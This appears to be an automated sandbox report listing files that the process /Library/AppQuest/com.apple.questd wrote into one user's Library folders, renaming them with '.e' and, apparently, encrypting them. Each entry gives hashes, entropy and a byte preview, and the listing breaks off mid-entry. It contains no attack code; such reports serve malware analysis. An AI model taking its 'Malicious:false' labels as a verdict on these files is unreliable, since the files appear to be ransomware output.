                                                                                                    Preview: ..@.7R...."=...).v......d~...7....Ec\..}jL...HX......b?.MO4b8...#...k.|.(N+,.?.D.&.uT...Pu.Y.`..Y..]...Q js.E.....&.;/.#<..@.`7.P.1....$.....7A...\..D/...]a0{...n@..(...4...-[....0$u.....c.@+G.... [J.RzNx..A..9Q...K..q.....8h.$.....0]e.)...8...<.b.EM4l_.....O...y....@..q...Mm.M.*.~7..k.k.W..o............x...N.[.+...][.x./........p...+....AH~..R..9D.1.....Um.......I.00=.[sH.....4....~R>xF.....;..i.=.k..............$..x......$..Q..........I...@....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.com.apple.corelocationagent.sfl.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):754
                                                                                                    Entropy (8bit):6.821499186863016
                                                                                                    Encrypted:false
                                                                                                    MD5:CFB53A77A68942A99A3C9ACC832C4611
                                                                                                    SHA1:3F1B8A83988C18078EF39B11A916901248CA6010
                                                                                                    SHA-256:BE4AFB15ED3F21E637FF2AD433F57B1E4B5540804BF3A5286692ADC36C71C8C9
                                                                                                    SHA-512:B94F453DDBF47CB953CCC000C437CEDCDC96A8913CC195D0C35214A2A41284EB9FBCF10B747118776563131CD67697F08E468886E16161D552C044E51822F131
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...."=...).v......d~...7....Ec\..}jL...HX......b?.MO4b8...#...k.|.(N+,.?.D.&.uT...Pu.Y.`..Y..]...Q js.E.....&.;/.#<..@.`7.P.1....$.....7A...\..D/...]a0{...n@..(...4...-[....0$u.....c.@+G.... [J.RzNx..A..9Q...K..q.....8h.$.....0]e.)...8...<.b.EM4l_.....O...y....@..q...Mm.M.*.~7..k.k.W..o............x...N.[.+...][.x./........p...+....AH~..R..9D.1.....Um.......I.00=.[sH.....4....~R>xF.....;..i.=.k..............$..x......$..Q............r...v..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.com.apple.installassistant.mojave.sfl.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):754
                                                                                                    Entropy (8bit):6.8121339428462795
                                                                                                    Encrypted:false
                                                                                                    MD5:205184C901FCC152ABCE44E9C62DA1CA
                                                                                                    SHA1:FC05D067FAEA1A9AB8543E52FFE0BBFB41CD64E8
                                                                                                    SHA-256:59425474DE94ABBB369549427E97654B1C3F40FD84F79AC99EC49B7EE384AA3C
                                                                                                    SHA-512:98523D4C40D0E66E462882A78BD9F08CB6B27D8ECED500584DFC396BE605F615F4EDE23645FB710448CF0221D01A201395BA71BA1A26CA836B79156B0668E617
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...."=...).v......d~...7....Ec\..}jL...HX......b?.MO4b8...#...k.|.(N+,.?.D.&.uT...Pu.Y.`..Y..]...Q js.E.....&.;/.#<..@.`7.P.1....$.....7A...\..D/...]a0{...n@..(...4...-[....0$u.....c.@+G.... [J.RzNx..A..9Q...K..q.....8h.$.....0]e.)...8...<.b.EM4l_.....O...y....@..q...Mm.M.*.~7..k.k.W..o............x...N.[.+...][.x./........p...+....AH~..R..9D.1.....Um.......I.00=.[sH.....4....~R>xF.....;..i.=.k..............$..x......$..Q..........I...@....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.com.apple.keyboardsetupassistant.sfl.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):754
                                                                                                    Entropy (8bit):6.821499186863016
                                                                                                    Encrypted:false
                                                                                                    MD5:CFB53A77A68942A99A3C9ACC832C4611
                                                                                                    SHA1:3F1B8A83988C18078EF39B11A916901248CA6010
                                                                                                    SHA-256:BE4AFB15ED3F21E637FF2AD433F57B1E4B5540804BF3A5286692ADC36C71C8C9
                                                                                                    SHA-512:B94F453DDBF47CB953CCC000C437CEDCDC96A8913CC195D0C35214A2A41284EB9FBCF10B747118776563131CD67697F08E468886E16161D552C044E51822F131
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...."=...).v......d~...7....Ec\..}jL...HX......b?.MO4b8...#...k.|.(N+,.?.D.&.uT...Pu.Y.`..Y..]...Q js.E.....&.;/.#<..@.`7.P.1....$.....7A...\..D/...]a0{...n@..(...4...-[....0$u.....c.@+G.... [J.RzNx..A..9Q...K..q.....8h.$.....0]e.)...8...<.b.EM4l_.....O...y....@..q...Mm.M.*.~7..k.k.W..o............x...N.[.+...][.x./........p...+....AH~..R..9D.1.....Um.......I.00=.[sH.....4....~R>xF.....;..i.=.k..............$..x......$..Q............r...v..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.com.apple.mail.sfl.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):754
                                                                                                    Entropy (8bit):6.8121339428462795
                                                                                                    Encrypted:false
                                                                                                    MD5:205184C901FCC152ABCE44E9C62DA1CA
                                                                                                    SHA1:FC05D067FAEA1A9AB8543E52FFE0BBFB41CD64E8
                                                                                                    SHA-256:59425474DE94ABBB369549427E97654B1C3F40FD84F79AC99EC49B7EE384AA3C
                                                                                                    SHA-512:98523D4C40D0E66E462882A78BD9F08CB6B27D8ECED500584DFC396BE605F615F4EDE23645FB710448CF0221D01A201395BA71BA1A26CA836B79156B0668E617
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...."=...).v......d~...7....Ec\..}jL...HX......b?.MO4b8...#...k.|.(N+,.?.D.&.uT...Pu.Y.`..Y..]...Q js.E.....&.;/.#<..@.`7.P.1....$.....7A...\..D/...]a0{...n@..(...4...-[....0$u.....c.@+G.... [J.RzNx..A..9Q...K..q.....8h.$.....0]e.)...8...<.b.EM4l_.....O...y....@..q...Mm.M.*.~7..k.k.W..o............x...N.[.+...][.x./........p...+....AH~..R..9D.1.....Um.......I.00=.[sH.....4....~R>xF.....;..i.=.k..............$..x......$..Q..........I...@....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.com.apple.maps.sfl.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):754
                                                                                                    Entropy (8bit):6.8121339428462795
                                                                                                    Encrypted:false
                                                                                                    MD5:205184C901FCC152ABCE44E9C62DA1CA
                                                                                                    SHA1:FC05D067FAEA1A9AB8543E52FFE0BBFB41CD64E8
                                                                                                    SHA-256:59425474DE94ABBB369549427E97654B1C3F40FD84F79AC99EC49B7EE384AA3C
                                                                                                    SHA-512:98523D4C40D0E66E462882A78BD9F08CB6B27D8ECED500584DFC396BE605F615F4EDE23645FB710448CF0221D01A201395BA71BA1A26CA836B79156B0668E617
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...."=...).v......d~...7....Ec\..}jL...HX......b?.MO4b8...#...k.|.(N+,.?.D.&.uT...Pu.Y.`..Y..]...Q js.E.....&.;/.#<..@.`7.P.1....$.....7A...\..D/...]a0{...n@..(...4...-[....0$u.....c.@+G.... [J.RzNx..A..9Q...K..q.....8h.$.....0]e.)...8...<.b.EM4l_.....O...y....@..q...Mm.M.*.~7..k.k.W..o............x...N.[.+...][.x./........p...+....AH~..R..9D.1.....Um.......I.00=.[sH.....4....~R>xF.....;..i.=.k..............$..x......$..Q..........I...@....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.net.java.openjdk.cmd.sfl.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):754
                                                                                                    Entropy (8bit):6.8121339428462795
                                                                                                    Encrypted:false
                                                                                                    MD5:205184C901FCC152ABCE44E9C62DA1CA
                                                                                                    SHA1:FC05D067FAEA1A9AB8543E52FFE0BBFB41CD64E8
                                                                                                    SHA-256:59425474DE94ABBB369549427E97654B1C3F40FD84F79AC99EC49B7EE384AA3C
                                                                                                    SHA-512:98523D4C40D0E66E462882A78BD9F08CB6B27D8ECED500584DFC396BE605F615F4EDE23645FB710448CF0221D01A201395BA71BA1A26CA836B79156B0668E617
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...."=...).v......d~...7....Ec\..}jL...HX......b?.MO4b8...#...k.|.(N+,.?.D.&.uT...Pu.Y.`..Y..]...Q js.E.....&.;/.#<..@.`7.P.1....$.....7A...\..D/...]a0{...n@..(...4...-[....0$u.....c.@+G.... [J.RzNx..A..9Q...K..q.....8h.$.....0]e.)...8...<.b.EM4l_.....O...y....@..q...Mm.M.*.~7..k.k.W..o............x...N.[.+...][.x./........p...+....AH~..R..9D.1.....Um.......I.00=.[sH.....4....~R>xF.....;..i.=.k..............$..x......$..Q..........I...@....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/.oracle.macjreinstaller.sfl.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):754
                                                                                                    Entropy (8bit):6.821499186863016
                                                                                                    Encrypted:false
                                                                                                    MD5:CFB53A77A68942A99A3C9ACC832C4611
                                                                                                    SHA1:3F1B8A83988C18078EF39B11A916901248CA6010
                                                                                                    SHA-256:BE4AFB15ED3F21E637FF2AD433F57B1E4B5540804BF3A5286692ADC36C71C8C9
                                                                                                    SHA-512:B94F453DDBF47CB953CCC000C437CEDCDC96A8913CC195D0C35214A2A41284EB9FBCF10B747118776563131CD67697F08E468886E16161D552C044E51822F131
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...."=...).v......d~...7....Ec\..}jL...HX......b?.MO4b8...#...k.|.(N+,.?.D.&.uT...Pu.Y.`..Y..]...Q js.E.....&.;/.#<..@.`7.P.1....$.....7A...\..D/...]a0{...n@..(...4...-[....0$u.....c.@+G.... [J.RzNx..A..9Q...K..q.....8h.$.....0]e.)...8...<.b.EM4l_.....O...y....@..q...Mm.M.*.~7..k.k.W..o............x...N.[.+...][.x./........p...+....AH~..R..9D.1.....Um.......I.00=.[sH.....4....~R>xF.....;..i.=.k..............$..x......$..Q............r...v..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/com.apple.spotlight/.appList.dat.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):30331
                                                                                                    Entropy (8bit):7.9821603760851
                                                                                                    Encrypted:false
                                                                                                    MD5:400BC89CD9F91A192D80E2439C9EC01A
                                                                                                    SHA1:50445A2A93409DC7BA98A3BEA2115E8F4C5957CE
                                                                                                    SHA-256:6612DCCA295F35735E239E5DAF297172EB883E5A69DFCC584A43468E5ADFD721
                                                                                                    SHA-512:E3868FDCA68E1371A75C311676B9D96C38E85A9BB677A165A99EEC3972E6D3CBCC7EB098A54E2323CDA15295BCC3EF7398D31E8381D26ACB0C2B03DA86C6EF0E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..j...z.R...,.v%f....R....d~...7....Ec\..}jL...HX....u...Ye.D..N...S..s......>..T.j<...W.J..T...G.g.......kS..Z.-..~...w.^!.5HB....C....W~.l..B]..U...@uI.`jU</..nh.OOL........$;...j....Z..".Lx2.Lq.Q...xn.1Y..s..$..2..G...6g....2.tV.ef..^...'X...3_..Sn.C..j....A*./q..Cq..8..e...j....G..+.N..'..N...e..%..W.N.%..F.U.a...y.P..U...L/.:&..B.Iw..u.......[..T....i.,`+p.zmE.cW...:.....gd.W.....8....E...-...p..`.....l...pa=.)5.5.......u.g}{..&..vp....D..G.....'-@..]..@...LUY0A.1?cub....O.*..H.*.d ...X...E.c..N..@._.B{..B%%.N.....A_....s......>X.......$.(?.Q..P.r.....]..i.,.."]|...JA.nu.)z.h@..f.;..l#Y.....q....8.G7A.\.F....y,.........J.'...w.IrGJs......b......o...>..e|fu.....Y.k.;.o......T...6.....j.=........c..}....C.i.......n.bz....\.k.H..XG.Z.1G%...D.T...x...M/.nJ...)..8#.B7.+8.)...D@.../....!1g{v....j^.q..5.7..h.z. .....A .,>.:.e);.,.@...%Yn~.Ue.(B..6....#$n.(.m.B3C........m.M..*.{.#.J|r..R.a.d.;....sx.H..8(...x.,T.`M'X.l._....}8.........j..'-.....E.*u...O@ K3:[...i....WW).....9.....O.
                                                                                                    /Users/ben/Library/Application Support/videosubscriptionsd/.VSSubscriptions.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.2796670989949335
                                                                                                    Encrypted:false
                                                                                                    MD5:B85F480100363E5E7559D90BB0E3D7BF
                                                                                                    SHA1:9F81CB4B8F3940ECA57599D841E10D6AF70E02F4
                                                                                                    SHA-256:FDF63BBF63A95097433CFB35D8E76AE40A9AAE963A3A47757E922353F217C46C
                                                                                                    SHA-512:22C065C49B19367A05697A85299F038653CE86F9CA97B7ADF5B2FAB18857CEA9074C3573304EC1ED4E4D4F45E2C1E570BA2B6A28FA4B4EADFB2954AC0642297E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L6~Fe.............................\ck?N..>.k....L6~Fe.....................L.D<.+..\ck?N...........9.o..h$.9.o..h$.........................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/videosubscriptionsd/.VSSubscriptions.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Application Support/videosubscriptionsd/.VSSubscriptions.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):74078
                                                                                                    Entropy (8bit):4.299449541010796
                                                                                                    Encrypted:false
                                                                                                    MD5:02BF7ACF956A61656C9CD6480EB44C18
                                                                                                    SHA1:C223B01495B10DEF29936E088E2D4741C12F31CD
                                                                                                    SHA-256:2EE9C27FB1598B9F80230C6AC8375D1BC957CB56F3009BE961BB71EC7FC74D91
                                                                                                    SHA-512:B5F2015CE86A87E6A45990213F8E2BDB1668B9D914E3DD781650032F7F8D5BA747FBAFAE39F90E71AE07DD6517F02B1732E6C11FF7F2DC0FA1684DD30694AE25
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t..Pc.............$/.".....B....[t...7...t...7............L.D<.+.......]!,,.<.~...w;.........,..u..d8. .i....oQ.W,e...~y..................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+......................................................................................................................V.Wn<R.F}..|..S+La.Vj:..VJ4
                                                                                                    /Users/ben/Library/Assistant/.sync_flagcom.apple.maps.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/.com.apple.mobilenotes.persistentstoreopen.lock.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/.com.apple.preferencepanes.cache.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):11186
                                                                                                    Entropy (8bit):7.942964010391323
                                                                                                    Encrypted:false
                                                                                                    MD5:81BD5109E5DBDBC796527DCA8C1DEAEE
                                                                                                    SHA1:FC6A005E90EA619C1F16CD3213F7D87E73F1328C
                                                                                                    SHA-256:626A1FAEA1C5C38847BD4BB0F62FD0F8FAB0C07F07946CF59A26E2ADFBA8782E
                                                                                                    SHA-512:650A3D6326D54B50218A8CE60FACEBCE9DE1A1DE737B2DBD105A32508DEAEF0A0174C6D9479C99DA41CF380566CBFC6FD1F4A3F68C94B396B9823BF2ACA84B5D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...%xo..g.Z.U.,...4..\;.L.w.<...w....\;.L.w.#....C...y...YLhK|.....7..t...s.T..|....\.~....)..V.....H,7T+.jzz~.[.m([..,.z.b.g......3.T.....S..=..8..........1...G..D...].C...-.....ho.......~,......./h.6Tr...........h.h!"!L...o.d.:..;....E].g.c........$...v|a..\.?...2...........)JD(......j.$..U.6w_mI/....3D.k4z....."..KR...k.)%.....C.........:X.k.Y.......-..^C.n.....c2.V.....i......0......@........3t....l......6.=.En...Dq..w.. .....3d..+*.g6.H.%......t..ll}+a....."&Ah1.~..Dg.9,...Ei..UX.......[.Q..R....n........%.....yJ....L$...._...&..g.......5..T.......i.......Hh.X..G......%.. ..%...-...X..._...t..h.......c!.M..M....._f..........yK.e.WT.I.m.6......D..$.o...........%.......L...)JD(..6......C.Sfo7."...S...*.j....q....1.gnN1-n;..t..........d.........@d`.5...4..........M2......1Db?s........d%.....=....+*.=Z...~n...l...8r6f....lD.o....._?..............,... vnnV...l...#..W..Q%...T.$...fRot.L.0.Pv...............0$u.....?.....j..id.Sl{..........\B^..)....8...y...Q..?.....(...6...1
                                                                                                    /Users/ben/Library/Caches/CloudKit/com.apple.cloudpaird/5c64ef931d8658ccf3553c9467b17fa4a3f57288/Records/.pcs.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.3492420254710957
                                                                                                    Encrypted:false
                                                                                                    MD5:79138239B914DBAE781D817F3653226A
                                                                                                    SHA1:2297DCB7916A3E50842F85867F27B474AB9E14BC
                                                                                                    SHA-256:C5BC7A1E750B31A71DAEA4F32956B5171D8ADDF6D44BFCCE7BA6467200A00484
                                                                                                    SHA-512:3798167ACE275B16423BEF1E9F0A908356B7F1FA3E48E2E824D229508F9FA8CAE3B508BCEFDB4966961E23292F8514D5C841E3436536C46CCB72B347974D0102
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L.B. i......5..^...l..\i::.....V#+Wt#8`7@>.k....L.B. i......5..^...l..\i:.Q.....;+Wt#8`7@............o....9.o..h$.........WTCG.R$..(%..z7Kp..x.*X..R.Y...9...d...R...@+{.R...@+{.R...@+{..................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/CloudKit/com.apple.cloudpaird/5c64ef931d8658ccf3553c9467b17fa4a3f57288/Records/.pcs.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):58053
                                                                                                    Entropy (8bit):4.152669362861141
                                                                                                    Encrypted:false
                                                                                                    MD5:21CC11C84C9DEAAEF9BEB637F557140B
                                                                                                    SHA1:2C1DDCC46DD37A2D8618C8D66FF8D48F1BD64F5B
                                                                                                    SHA-256:23AEDCC5DA60E4D5D61460136091EDDB8502E8F5D5AFEAAC94FC4AF760D00E89
                                                                                                    SHA-512:6EDD3D0155D4FFE55AA2407EAE3251E5CF8A405655FA1ADF0B10FB8EA9CAF51EA454262AB2B4FFF1C6696839E726099A18D0B2649650BCE681E13AC140C5F4E9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$...:.....V#..j..K..t...7...:.....V#.r..H..p.#.1rS..a....lT........t....)..V........u..!.....`...=P*.<w..F.7t...7.........................]!;.......)K.Y.F..V...J!...................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/CloudKit/com.apple.cloudpaird/5c64ef931d8658ccf3553c9467b17fa4a3f57288/Records/.pcs.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.759660724229312
                                                                                                    Encrypted:false
                                                                                                    MD5:19E0EB2E5C8983D5E846F27CB3C4330B
                                                                                                    SHA1:056410A40B1D5BD93A1045BA9EA5D9338B4AA373
                                                                                                    SHA-256:8B733A6B6DA3CC8FC8CC78C850899B24EA9CDDAF6F5C6127CA9122D04ED0FF96
                                                                                                    SHA-512:F33DC5546D9CA04829F0022C325C7AF5E2509B543FFEA7189482C7EAA8A507A6F1CE87D1155C76DBB92057AD72FA5F042D1ACE383CC95FC83C1105B37FB0FC4F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........tp.v...})................{...#Rox........t...7............L.D<.+.%R4,....,,.<.~....%....+.................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/CloudKit/com.apple.cloudpaird/ce49f3500a597aa2dca9af15112d99e9363cd778/Records/.pcs.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.3500489758977823
                                                                                                    Encrypted:false
                                                                                                    MD5:62E28432DF1FCCE9320B88D0372D0ED7
                                                                                                    SHA1:BD92E2FEDB98AC50F47FABA58BED286AE813328B
                                                                                                    SHA-256:A707DD107E182103EF3967869C342C5EA84C3635B90FA80B585278F443310E36
                                                                                                    SHA-512:738B0ED654B87A1076DE306AAE5B3B9E2119B1ECEDBA2D5BA359FA8755022E2924517037A0CC3507A5CF758EE61E1565FE15FF04CED45983B7520BD5F912895C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L.B. i......5..^..6...}ae.V....X.2....;..>.k....L.B. i......5..^..6...}aed]O~.WA.2....;..............o....9.o..h$.........WTCG.R$..(%..z7Kp..x.*X..R.Y...9...d...R...@+{.R...@+{.R...@+{..................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/CloudKit/com.apple.cloudpaird/ce49f3500a597aa2dca9af15112d99e9363cd778/Records/.pcs.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):58053
                                                                                                    Entropy (8bit):4.152146548072414
                                                                                                    Encrypted:false
                                                                                                    MD5:3FA2D217B6C8E88149F95D82A6D8433C
                                                                                                    SHA1:24621451BB32BF34AF8BDFF37D7D817C157F3841
                                                                                                    SHA-256:AD8BBA8AAD30DE0ACDEA174E745AF2CB5193A39417F8B495F461B178FDCA44A9
                                                                                                    SHA-512:3119B8005D988767A162FFBEC22627B526ABB2D7A443566DDED1645DD7C9DB56D6FB2824878B33627E9013E1E7E965A05E9AFBDBE602BD1CD10919EBB3DA751A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$....V....X..Mj.K...t...7....V....X.TaOa..S..#.1rS..a....lT........t....)..V........u..!.....`...=P*.<w..F.7t...7.........................]!;.......)K.Y.F..V...J!...................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/CloudKit/com.apple.cloudpaird/ce49f3500a597aa2dca9af15112d99e9363cd778/Records/.pcs.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.7576459657496444
                                                                                                    Encrypted:false
                                                                                                    MD5:BB062D0646B38F548B8B2054482BEB75
                                                                                                    SHA1:859935C3E05FD92E1B9865F827D6ED61F2BC4953
                                                                                                    SHA-256:1E1D2A9BB883C7CF1CC591EEF738417B95BC00D4F66D3D8F267E46071A398C76
                                                                                                    SHA-512:D3BCEE67468BB0245D3B6DECBF9ED05BA5103C0A8C2B59E4B4B42295F2F98B6E74D7ABD23A86C27BDE9682255D6B802995BB9DC1D807A2DE1C5327F756118F8B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........tp.v...})................{...#Rox........t...7............L.D<.+.%R4,....,,.<.~....%....+.................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/CloudKit/com.apple.textinput.KeyboardServices/com.apple.keyboardservicesd/2bb72ec7676f1ef6f5f88fa889a77a9f1443a05d/Records/.pcs.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.3320524735088224
                                                                                                    Encrypted:false
                                                                                                    MD5:E3210F6283A9105676A7672F2B012179
                                                                                                    SHA1:09D4169D939EE8C6BA4135B143C60DB3C7E40475
                                                                                                    SHA-256:63BC1535BA0F2C49939A80A87E07C1C44691670E84CA3C741098EF6CDE0EC3D1
